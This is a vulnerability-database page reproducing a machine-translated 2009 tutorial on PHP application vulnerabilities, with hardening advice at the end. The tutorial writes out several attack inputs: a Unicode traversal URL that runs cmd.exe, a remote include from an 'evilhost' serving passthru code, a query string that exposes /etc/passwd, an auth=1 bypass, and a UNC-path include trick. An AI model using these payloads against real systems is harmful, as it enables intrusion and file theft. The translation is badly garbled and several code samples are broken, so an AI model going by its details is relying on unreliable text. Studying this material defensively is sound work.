Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62200923487
HistoryJun 08, 2009 - 12:00 a.m.

PHP application of Common Vulnerability analysis-vulnerability warning-the black bar safety net

2009-06-0800:00:00
佚名
www.myhack58.com
15
JSON

Transfer from: WhyTT
Not impregnable, as PHP is widely used, some hackers also at no time not looking for a PHP trouble, by the PHP application vulnerability to attack is one of them. In the section, we will from a global variable, remote file, file upload, library files, Session files, data types, and error-prone function that several aspects of the analysis of PHP security.

How to pass global variables to the attack?

Variables in PHP do not need to declare in advance, they will at first use automatically created, their type according to the context environment automatically determined. From the programmer’s point of view, this is certainly a extremely convenient approach. Once a variable is created, it can be in the program anywhere. This feature leads to the result is that programmers seldom initialize variables.

Obviously, the PHP-based application’s main function typically is to accept the user’s input was mainly form variables, uploaded files and Cookies, etc., and then the input data is processed and the results returned to the client browser. In order to make the PHP code to access the user’s input as easy as possible, in fact PHP is put these input data as global variables to deal with.

For example:

PHP code

  1. <FORM METHOD=“GET” ACTION=“test.php”>
  2. <INPUT TYPE=“TEXT” NAME=“hello”>
  3. <INPUT TYPE=“SUBMIT”>
  4. </FORM>

This will display a text box and a Submit button. When the user clicks the Submit button, the"test.php"will process user input, when"test.php"run,“$hello"would contain the user in the text box to enter data. From here we should see, the attacker can according to their own will create any global variables. If the attacker is not through form input to invoke the"test.php"but directly in the browser address bar, enter http://server/test. php? hello=hi&setup=no, then more than”$hello"is created,"$setup"is also created.

The following user authentication code is exposed to the PHP global variables the result of the security issues:

PHP code

  1. <? php
  2. if ($pass == “hello”)
  3. $auth = 1;
  5. if ($auth == 1)
  6. echo “some important information”;
  7. ?& gt;

The above code first checks the user’s password is"hello", if match, set the"$auth"to"1", i.e., by certification. After if"$suth"to"1", then it will display some important information.

This code assumes that"$auth"is not set in the value when it is empty, but the attacker can create any global variables and assigned values, by a similar"http://server/test.php?auth=1"of method, we can fool this code, making it believe we are already certified.

Therefore, in order to improve PHP application security, we can’t believe anything without a clear definition of the variables. If the variables in the program a lot of words, but this is a very difficult task.

A commonly used protection method is to check the array HTTP_GET[]or POST_VARS[]in the variable, which is dependent on our submission methods GET or POST to. When PHP is configured to open the"track_vars"option which is the default value, the user submitted variables in the global variables and the above-mentioned array.

But worthy of note is that PHP has four different array variables to handle user input. HTTP_GET_VARS array is used to processing GET submission of the variables, HTTP_POST_VARS array for processing the POST method to submit the variables; HTTP_COOKIE_VARS array for processing as cookie header of the submitted variables, and for the HTTP_POST_FILES array to compare the new PHP only, it is entirely the user used to submit the variables in an alternative way. The user of a request can easily put variables in the presence of the four in the array, and therefore a secure PHP program should check the four arrays.

How to pass the remote file to be attacked?

PHP is a feature-rich language, provides a number of functions that make programming very easy to implement a specific function. But from a safety point of view, the function more, to ensure that it security is more difficult, the remote file support with this problem a good example:

PHP code

  1. <? php
  2. if (! ($fd = fopen(“$filename”, “r”))
  3. echo(“Could not open file: $filename<BR>\n”);
  4. ?& gt;

The above script is trying to open the file"$filename", if it fails it displays an error message. Obviously, if we are able to specify"$filename", then you can use this script to browse the system in any file. However, this script also exists a less obvious characteristic is that it can be from any other WEB or FTP site to read files. In fact, PHP most of the file processing function to a remote file the process is transparent.

For example:

If you specify"$filename"“http://target/scripts/..�../winnt/system32/cmd.exe?/c+dir

The above code is actually using the host target on the unicode vulnerability, the implementation of the dir command. This makes support of remote file include () and require () and the include_once()and require_once()in the context of the environment becomes more interesting. These function the main function is to contain the specified file content, and put them in the PHP code explanation, is mainly used in the library file.

For example:

PHP code

  1. <? php
  2. include($libdir . “/languages.php”);
  3. ?& gt;

In the example above"$libdir"is generally the one in the implementation of the code before has set a good path, if the attacker is able to make"$libdir"has not been set, then he will be able to change this path. But the attacker can not do any thing, 因为他们只能在他们指定的路径中访问文件languages.php(in perl"Poisonnull byte"attacks on PHP no. But thanks to the remote file support, the attacker can do anything. For example, 攻击者可以在某台服务器上放一个文件languages.php that contains the following content:

PHP code

  1. <? php
  2. passthru(“/bin/ls /etc”);
  3. ?& gt;

Then put"$libdir"is set to"http://of < evilhost > a/“, so that we can be on the target host to perform the above exploit code, The”/etc"directory of the content will be returned as results to the client browser.

Note that the attack code is not in itself where the server is evilhost on execution to perform its own PHP application, otherwise, the exploit code that will attack their own server, instead of the target server for execution.

How to upload files to attack?

PHP automatic support based on RFC 1 8 6 7 in the file upload, we see the following example:

PHP code

  1. <FORM METHOD=“POST” ENCTYPE=“multipart/form-data”>
  2. <INPUT TYPE=“FILE” NAME=“hello”>
  3. <INPUT TYPE=“HIDDEN” NAME=“MAX_FILE_SIZE” VALUE=“1 0 2 4 0”>
  4. <INPUT TYPE=“SUBMIT”>
  5. </FORM>

The above code allows the user from the local machine to select a file, when you click Submit, the file will be uploaded to the server. This is obviously very useful functions, but the PHP response will make this function becomes unsafe. When PHP first receives such a request, even before it began parsing is called in the PHP code before it will accept a remote user’s file, check the length of the file exceeds"the$MAX_FILE_SIZE variable"definition of value, if by these tests, the file will be stored locally in a temporary directory.
Therefore, the attacker can send any file to run PHP host in PHP the program haven’t decided whether to accept the file upload, the file is already exists on the server.

Let us consider processing the file upload in the PHP program, as we said above, the file is received and is present on a server location is specified in the configuration file, typically/tmp, the filename is generally random, similar to the"phpxXuoXG"form. The PHP application need to upload a file of information in order to process it, this can be achieved by two ways, one way is in the PHP3 has been used, another is our previous method proposed security Bulletin after the introduction.

Most of the PHP program still use the old way to process the uploaded file. PHP sets four global variables to describe the uploaded file, such as that of the surface example:

PHP code

  1. $hello = Filename on local machine (e. g “/tmp/phpxXuoXG”)
  2. $hello_size = Size in bytes of file (e. g 1 0 2 4)
  3. $hello_name = The original name of the file on the remote system (e. g"c:\\temp\\hello.txt")
  4. $hello_type = Mime type of uploaded file (e. g “text/plain”)

Then, the PHP application starts processing according to the"$hello"to the specified file. The problem is that"$hello"is not necessarily a PHP set of variables, any remote user can specify it. If we use the following way:

http://vulnhost/vuln.php?hello=/etc/passwd&amp;hello_size=1 0 2 4 0&hello_type=text/plain&amp; hello_name=hello.txt

Leads to the following PHP global variables, of course, the POST method can also be even is Cookies: the

PHP code

  1. $hello = “/etc/passwd”
  2. $hello_size = 1 0 2 4 0
  3. $hello_type = “text/plain”
  4. $hello_name = “hello.txt”

The above form data just to meet the PHP program the desired variable, but in this case the PHP application is no longer processing the application in the upload of the machine on the uploaded file, but the processing on the server"/etc/passwd"typically lead content of the exposed file. This attack can be used to expose any sensitive file content.

The new version of PHP to use HTTP_POST_FILES[]to determine the uploaded file, while also providing a lot of function to solve this problem, for example there is a function used to determine whether a file is not actually contained in the file. But in fact sure a lot of the PHP application is still using the old method, so it is vulnerable to this attack.

As the file upload method of attack of a variant, we look at the following code:

PHP code

  1. <? php
  2. if (file_exists($theme)) // Checks the file exists on the local system (noremote files)
  3. include(“$theme”);
  4. ?& gt;

If an attacker can control"$theme", then obviously it can use"$theme"to read the remote system on any file. The attacker’s ultimate target is on a remote server execute arbitrary commands, but he cannot use a remote file, therefore, he must be on the remote server create a PHP file. This at first glance seems to be impossible, but the file upload to help us this busy, if the attacker first on the local machine to create a PHP code file, and then create a named"theme"in the file field of the form, and finally with this form via file upload the created containing the PHP code of the file submitted to the code above, PHP will put the attacker to submit the file saved, and the"$theme", set the value for an attacker submitted the file, so that the file_exists()function check is passed, the attacker’s code will also be executed.
To obtain the execution of any command ability after the attacker apparently wanted to elevate privileges or to expand the Victories, which in turn requires some server are not on the toolset, and upload the file once again helped the attacker’s favor. The attacker can use the file upload function of the upload tool, to put their presence on the server, and then use them to perform the instruction of the ability to use chmod()to change the file permissions, and then executed. For example: an attacker can bypass the firewall or IDS to upload a local root attack the program, and then executed, this will get the root access.

How to pass the library file to be attacked?

As we discussed earlier, include()and require()is mainly to support the code library, because we usually put some frequently used functions into a separate file, this separate file is the code library, when you need to use one of the function, we just put this code library is included into the current file.

Initially, people develop and publish a PHP program, in order to distinguish the Code of the library and the main program code, generally as a code library file set a". inc"extension, but they soon found this to be an error, because such files cannot be the PHP interpreter correctly parsed as PHP code. If we direct a request to the server on this file, we’ll get the source code of the file, this is because when the PHP as Apache module when using PHP interpreter is based on the file extension to decide whether to parse for PHP code. Extension is the site administrator specified, generally". php" and “. php3"and”. php4 is". If the important configuration data is contained in the absence of a suitable extension of the PHP file, then a remote attacker to easily get these information.

The easiest solution is: give each file specify a PHP file extension, this can be very good to prevent the disclosure of the source of the problem, but also generated a new problem, by requesting this file, the attacker may make the present the in the context of the code running independently, this may lead to the previously discussed all of the attacks.

The following is a very obvious example:

PHP code

  1. In main.php:
  2. <? php
  3. $libDir = “/libdir”;
  4. $langDir = “$libdir/languages”;
  6. include(“$libdir/loadlanguage.php”:
  7. ?& gt;
    1. In libdir/loadlanguage.php:
      1 0. <? php
      1 1. …
      1 2. 1 3. include(“$langDir/$userLang”);
      1 4. ?& gt;

When"libdir/loadlanguage.php"to be"main.php"the time of the call is quite safe, but because"libdir/loadlanguage"having". php"extension, so a remote attacker can directly request this file, and can specify any"$langDir"and"$userLang"value.

How to pass the Session file for the attack?

PHP 4 or newer version provides for sessions of support, its main role is in the PHP program save the page and between the pages of status information. For example, when a user login into website, he landed the this fact as well as who log into this website, the related information will be saved in the session, when he was in the site to browse all of the PHP code can access the state information.

In fact, when a session start time is actually set in the configuration file for the first request when automatically started, it will generate a random"session id", if the remote browser always sends a request when submitted to this"session id", session will be kept. This Cookie is easy to implement, can also be on each page to submit a form variable that contains the"session id". The PHP program can use the session to register a special variable, its value will be in each PHP script after the end of the present session file in each PHP script before the start of loading to the variable. The following is a simple example:

PHP code

  1. <? php
  2. session_destroy(); // Kill any data currently in the session
  3. $session_auth = “shaun”;
  4. session_register(“session_auth”); // Register $session_auth as a session variable
  5. ?& gt;

The new version of PHP will automatically put the"$session_auth"value is set to"shaun", if they are modified while a later script will automatically accept the modified value, which for a stateless Web is indeed a nice tool, but we should also be careful.

One obvious problem is to ensure that the variables are indeed from the session, for example, given the code above, if the follow-up of the script is the following words:

PHP code

  1. <? php
  2. if (! emptyempty($session_auth))
  3. // Grant access to site here
  4. ?& gt;

The above code assumes that if"$session_auth"is assigned the value of words, that is, from the session, rather than from user input to assign values, if the attacker through a form input to assign a value to the words, he can get to the site access. Note that the attacker must be in the session to register the variables before using this attack method, once a variable is in session, it will override any of the form input.

Session data is generally saved in a file location is configurable, is generally"/tmp", the file name is typically something like"sess_<session id>"form this file contains the variable name, variable type, variable values and some other data. In multi-host systems, because the file is to runthe Web serverthe user identity is nobody to save, so a malicious site owner can create a session file to gain access to other sites access, you can even check the session file of the sensitive information.

The Session mechanism also for the attacker to put their own input stored on a remote file system provides another convenient. For the above example, the attacker would need at the remote system placed the one that contains the PHP code of the file, if not use the file upload to do it, he usually will use the session as a variable in their willingness to assign a value, and then guess the session file location, which he knows the file name is"php<session id>“, so just guessing the directory, and the directory is generally”/tmp" in.

In addition, the attacker can arbitrarily specify a"session id", for example"hello", and then use this"session id"to create a session file such as"/tmp/sess_hello","session id"can only be letters and numbers together.

How to pass the data type to attack?

PHP has loose data types, The type of the variable depends on the context. For example:“$hello"start is a string variable, the value is”“, but in the evaluation value, it becomes the integer variable"0”, which may sometimes lead to some unexpected results. If the"$hello"the value is"0 0 0"or"0"is different, empty()returns results is also not true.

In PHP arrays are associative arrays, that is, the array index is a string type. This means that the"$hello[“0 0 0”]“and”$hello[0]"is also different.

The development program should carefully consider the above issues, for example, we should not be in aTest a certain variable is"0", and in other places use empty()to verify.

How to through the error-prone function for attack? The following is a more detailed error prone in the function list:

PHP code

  1. <PHP code execution>
  2. require (): reads the specified file content and as a PHP code explanation
  3. include (): Ibid.
  4. eval (): the given string as PHP code execution
  5. preg_replace (): when the"/e"switch when used together, the replacement string will be interpreted as PHP code
    1. <command to execute>
  7. exec (): execute the specified command and returns the result of the last line
  8. passthru (): execute the specified command, returning all results to the client browser
    1 0. The`: Execute the specified command, and returns all results into an array
    1 1. system () with passthru (), but does not handle binary data
    1 2. popen (): execute the specified command, the input or output is connected to a PHP file descriptor
    1 3. 1 4. <file disclosure>
    1 5. fopen (): opens a file, and corresponds to a PHP file descriptor
    1 6. readfile (): reads the contents of the file, and then output to the client browser
    1 7. the file (): put the entire contents of the file read into an array

How to enhance PHP security?

We in the above description all attacks for the default installation of PHP4 can be very good implementation, but PHP configuration is very flexible, by configuring some of the PHP options, we entirely possible to resist some of the attacks. Below we according to the difficulty of implementation of some of the configuration classification:

*Low difficulty
**Low difficulty ***In difficult
****Difficult

If you use the PHP provided all the options, then your PHP will be very safe, even third party code is also true, because of which many features have not been used.

**** Set"register_globals"to"off"
This option will disable PHP for user input to create the global variable, that is, if the user submit the form the variable"hello", PHP does not create"$ hello", but will only create"HTTP_GET/POST_VARS[‘hello’] is". This is PHP an extremely important option, turn off this option, will give programming to bring a lot of inconvenience.

*** Set"safe_mode"to"on"

Open this option will add the following restrictions:

1. To limit which commands can be executed
2. Restrict which functions can be used
3. Based on the script ownership and object file ownership, file access restrictions
4. To prohibit file uploads

This is for the ISP to say is a"great"option, but it also can greatly improve PHP’s security.

** Set the"open_basedir"

This option can disable the specified directory with the file operation, effectively eliminates local file or remote file is include()attacks, but still need to pay attention to upload files and session files of the attack.

** Set"display_errors"to"off", set"log_errors"to"on"

This option suppresses the error message is displayed in a web page, but recorded to a log file, which can effectively resist the attacker to the target script in a function of the probe.

  • Set"allow_url_fopen"to"off"

This option can disable the remote file function.

//Here allow_url_fopen note that,in the jnc blog on the see,can be used

PHP code

  1. <? php
  2. include(‘\\myip\test.php’);
  3. ?& gt;
    1. <? php
  5. include(‘//myip\test.php’);
  6. ?& gt;

To spare?

JSON